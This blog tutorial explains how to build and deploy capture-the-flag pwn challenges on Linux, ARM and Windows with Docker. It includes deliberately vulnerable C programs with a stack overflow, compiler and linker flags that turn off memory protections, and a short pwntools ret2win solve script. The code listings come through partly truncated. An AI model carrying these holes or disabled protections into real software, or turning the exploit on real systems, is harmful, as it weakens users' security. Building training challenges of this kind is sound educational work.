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Writing and Deploying Pwn Challenges [Multi-arch/OS]



This blog post will cover all the basics on how you can develop pwn challenges [Linux, Windows and ARM[hf/64]] and how to deploy them using docker so that they'll allow remote connections.

| Similar concept is applicable to Crypto, Jail or other challenges that require a netcat connection.

Table of Content

Challenge Development

Let's consider the following source code:

// gcc -o main main.c -no-pie -fno-stack-protector -w
#include <stdio.h>

void __constructor__(){
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);

void win() {
    const int FLAG_SZ = 0x1A;
    char flag[FLAG_SZ];
    FILE *fp = fopen("flag.txt", "r");
    if(!fp) {
        puts("Unable to read the flag!");
    fread(flag, 1, FLAG_SZ, fp);
    flag[FLAG_SZ] = '\0';

void vuln() {
    char buffer[0x20];
    printf("You have to jump to: 0x%llx\n", win);

int main(int argc, char* argv) {

I won't go through where the vulnerability exists, and how we can exploit it, however, the one function called __constructor__ is pretty important. What this will do, is set buffering, so when this binary is hosted to receive connection through a socket, it's IO will be unbuffered and will allow for stdin, stdout and stderr to be served over a socket. And alarm will automatically send SIGALARM to the binary after n seconds, i.e. in our case 0x10 seconds.

For every pwn chal that you create, make sure to just copy paste this __constructor__ function, or set buffering yourself.


In order to compile binary for Linux systems, we need gcc (or g++; depending on the challenge). But, there are certain flags to add/remove certain mitigations which are in place.

The following table contains all the information we need to know about the gcc flags for pwn:

-fno-stack-protectorDisable Stack Canary
-no-pieDisables PIE on the final executable and also sets RELRO to partial
-zexecstackMarks the stack as executable
-Wl,-z,norelroSets no RELRO

NOTE: PIE must be disabled for RELRO to be partial.

Now, to deploy this challenge, we will make use of my own docker image. TheFlash2k/pwn-chal. I wrote this image to abstract the deployment of a pwn challenge. The documentation is pretty extensive so in order to understand the use of the variables, refer to the docs.

To deploy a challenge, you need to set only one variable, CHAL_NAME. If you have the flag, you can also copy the flag accordingly. We'll use: CTF{F4k3_fl4g_f0r_73s71ng} as flag.txt. The final Dockerfile is as follows for this particular challenge:

FROM theflash2k/pwn-chal:latest

COPY flag.txt .

Now, what this will do is simply copy the file from our folder into /app inside the container and then serve the binary using ynetd on port 8000.

| NOTE: Both ynetd and port 8000 can be changed using their respective variables. Refer to docs.

Now, into run this, we must first build the image, and then run the image like this:

docker build -t my-first-pwn-chal .

docker run -it --rm --name my-first-pwn-chal --hostname pwn-chal -p8000:8000 my-first-pwn-chal

Once you run the container, you'll see the following message in the logs:

[i] Running main in /app as ctf-player using ynetd and listening locally on 8000

Now, in order to interact with the binary, you can use netcat or pwntools. We'll use pwntools and the final solve script will look something like this:
#!/usr/bin/env python3

from pwn import *

io = remote(sys.argv[1], int(sys.argv[2])) if args.REMOTE else process("./main")
leak = int(io.recvline()[:-1], 16)
info("Jumping to: %#x" % leak)
payload = flat(cyclic(0x28, n=8), leak)


Running the script, we can see the output:

$ ./ REMOTE localhost 8000

[+] Opening connection to localhost on port 8000: Done
[*] Jumping to: 0x40126c
[*] Switching to interactive mode
[*] Got EOF while reading in interactive


Similar to x86-64 Linux, ARMHF and ARM64 have a similar set of mitigations, however, the steps for compilation of the binary are slightly different. Instead of gcc, for armhf we'll use arm-linux-gnueabihf-gcc which is available in the gcc-arm-linux-gnueabihf and aarch64-linux-gnu-gcc for arm64 which is available in the gcc-aarch64-linux-gnu package. In order to install both of these on ubuntu (any distro that uses apt as the package manager):

sudo apt install -y gcc-aarch64-linux-gnu gcc-arm-linux-gnueabihf

Now, on the host you're trying to run this, you'll also need to run the following commands:

# Install the qemu packages
sudo apt-get install qemu binfmt-support qemu-user-static

# This step will execute the registering scripts
docker run --rm --privileged multiarch/qemu-user-static --reset -p yes

After this, once you have compiled the binary, you can setup the container using the following Dockerfile:

FROM theflash2k/pwn-chal:arm64

ENV CHAL_NAME=main-arm
COPY flag.txt .

Similar to previous one, to build and run:

docker build -t my-first-arm-chal . -f Dockerfile-arm

docker run -it --rm --name my-first-arm-chal --hostname pwn-chal -p8000:8000 my-first-arm-chal

| NOTE: If you face an error like ERROR: failed to solve: failed to prepare sha256:83a8575584e7f1c27963093b075aa5cffc5e00a57b8ae763eb099d39cee3a58a as so004yt4o3993aozx7r0rfndb: open /var/lib/docker/overlay2/7sz44aynq53dorxseoxcy8eak/.tmp-committed79317842: no such file or directory, make sure to recheck whether you've ran the commands you needed to run for ARM or not.

On running this container, we see the following:

[i] [QEMU] using qemu-aarch64 and libaries @ /usr/aarch64-linux-gnu
[i] Running main-arm in /app as ctf-player using ynetd and listening locally on 8000 using qemu-aarch64

Once done, we'll use the same exploit and see whether everything is working fine for us or not.

$ ./ REMOTE localhost 8000

[+] Opening connection to localhost on port 8000: Done
[*] Jumping to: 0x4008dc
[*] Switching to interactive mode
[*] Got EOF while reading in interactive

| NOTE: This sample file is for ARM64, for ARMHF, it's the exact same.


Windows pwn has been on my radar for almost a year now, but never had the time (or motivation) to learn it. So, I decided to learn windows pwn and came up with a few challenge ideas. Couldn't find a easy-to-deploy tech that could easily integrate with my already existing CTFd stack. So, that's how this image came into being. I just finished finalizing the image and testing against several challenges.

For emulation, I'm using wine and xvfb to emulate a virtual display buffer. The internal implementation are already public and you can modify that accordingly to your needs. But, in order to compile a challenge for Windows on Linux, we'll make use of mingw.

Compiling a binary on Visual Studio, we can find and disable the mitigations (and some other important settings) accordingly:

Randomized Base AddressProject>Properties>Linker>Advanced-
Data Execution Prevention (DEP)Project>Properties>Linker>AdvancedPrevent shellcode execution on the stack (NX)
Image Has Safe Execption Handlers (SafeSEH)Project>Properties>Linker>AdvancedSets up a lookup table for the binary to know which SEH are valid
CET Shadow Stack CompatibleProject>Properties>Linker>Advanced-
Allow IsolationProject>Properties>Linker>Manifest FileSpecifies behavior for manifest lookup
Enable C++ MitigationsProject>Properties>C/C++>Code GenerationSpecify the mode of exception handling (SEH or simple EH)
Security CheckProject>Properties>C/C++>Code GenerationAuto-detect stack overflows
Control Flow Guard (CFG)Project>Properties>C/C++>Code Generation-
Spectre MitigationProject>Properties>C/C++>Code Generation-

Whereas, if compiling with mingw, you need to use -Wl to pass the following flags to the linker:

--no-sehTurns off SEH for the image
--dynamicbaseEnables ASLR on the binary
--nxcompatEnables NX [DEP] on the binary
--no-demangleDo not demangle the symbol names
--high-entropy-vaImage is compatible with 64-bit address space layout randomization (ASLR)
--forceintegCode integrity checks are enforced
--no-isolationImage understands isolation but do not isolate the image

Now, for windows we'll use the following source code:

#include <stdio.h>
#include <windows.h>

void win() {
    const DWORD FLAG_SZ = 0x1A;
    DWORD dwArg;
    char flag[FLAG_SZ];
    HANDLE _stdin = GetStdHandle(STD_INPUT_HANDLE);
    HANDLE _stdout = GetStdHandle(STD_OUTPUT_HANDLE);

    HANDLE file = CreateFileA("C:\\flag.txt", GENERIC_READ, 0,
    ReadFile(file, flag, FLAG_SZ, &dwArg, NULL);
    WriteFile(_stdout, flag, FLAG_SZ, &dwArg, NULL);

void vuln() {
    char buffer[0x20];
    printf("You have to jump to: 0x%llx\n", win);

int main(char argc, char** argv) {

    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);


The main.c and enable Dynamic base and disable SEH. We'll compile this using mingw. The final command for compilation is as follows:

x86_64-w64-mingw32-gcc -o main.exe main.c -w -Wl,--dynamicbase -Wl,--no-seh

This is because we need to set the buffering for Windows based binaries as well and since __constructor__ won't be automatically called in the windows based binaries, we'll just manually add them in the main function. There are ways to automatically execute a function when binary is loaded, but those are too complex and not in the scope of this blog.

After compling the binary, we'll run winchecksec on this binary:

Warn: No load config in the PE
Results for: main.exe
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX              : "NotPresent"
SEH             : "NotPresent"
CFG             : "NotPresent"
RFG             : "NotPresent"
SafeSEH         : "NotApplicable"
GS              : "NotPresent"
Authenticode    : "NotPresent"
.NET            : "NotPresent"

Now, for the Dockerfile, it will be as follows:

FROM theflash2k/pwn-chal:windows

ENV CHAL_NAME=main.exe
COPY flag.txt .

Once again, for building and running:

docker build -t my-first-windows-chal . -f Dockerfile-win

docker run -it --rm --name my-first-windows-chal --hostname pwn-chal -p8000:8000 my-first-windows-chal

| NOTE: When running the container for the first time, it will take around 10-15 seconds to setup all the wine related prefixes and registries. Once that's setup, everything else will be smoooth.

Now, in the output, we can see some useful information:

[i] [WINDOWS] Setting up wine prefixes and registries...
[i] [WINDOWS] Setting WINEPREFIX=/home/ctf-player/.wine
[i] [WINDOWS] Output debugging is disabled
[i] [WINDOWS] Running main.exe as ctf-player using socat and listening locally on 8000

Now, if output debugging is enabled (it can be enabled using WIN_DEBUG=1 environment variable), we'll see more output when you try to access an invalid memory or write some wonky shellcode.

After running our previous exploit, we'll get the flag:

./ REMOTE localhost 8000
[+] Opening connection to localhost on port 8000: Done
[*] Jumping to: 0x401560
[*] Switching to interactive mode

Linux Kernel

For Linux kernel based challenges' deployment and development, you can refer to Papadoxie's guide. He has explained it in great detail.


For automation purposes I have made the following Makefile that has tons of these commands and you can just a make's target to perform a certain task. The Makefile is as following:

# Author: @TheFlash2k

CHAL_NAME := test
DEFAULT_FLAG := "CTF{F4k3_fl4g_f0r_t3st1ng}"

CC := gcc
FLAGS := -w -std=c++11

    $(CC) -o $(CHAL_NAME) $(SRC) $(FLAGS)

    mkdir -p ../dist/
    mv flag.txt og_flag.txt
    echo $(DEFAULT_FLAG) > flag.txt
    # you can change these files to your likings
    tar -zcvf $(TAR_FILE) $(SRC) $(CHAL_NAME) Dockerfile flag.txt
    mv og_flag.txt flag.txt
    # rm -f ../dist/$(TAR_FILE)
    # mv $(TAR_FILE) ../dist/

    # This will generate a dockerfile for your challenge accordingly:
    rm -f Dockerfile
    echo "FROM theflash2k/pwn-chal:latest" > Dockerfile
    echo -e "\nENV CHAL_NAME=$(CHAL_NAME)" >> Dockerfile
    echo -e '\nCOPY $${CHAL_NAME} .' >> Dockerfile
    echo -e "COPY flag.txt ." >> Dockerfile

    docker build -t $(CONTAINER_NAME) .

    docker run -it --rm -p1337:8000 --hostname $(CHAL_NAME) --name $(CONTAINER_NAME) $(CONTAINER_NAME)

    docker stop $(CONTAINER_NAME)

    mkdir -p ../writeup/
    mv -f ../writeup/
    cp $(CHAL_NAME) ../writeup/
    echo "# $(CHAL_NAME)" > ../writeup/
    rm -f $(CHAL_NAME)
    docker rmi $(CONTAINER_NAME)

This is my personal Makefile that I use for challenges' deployment.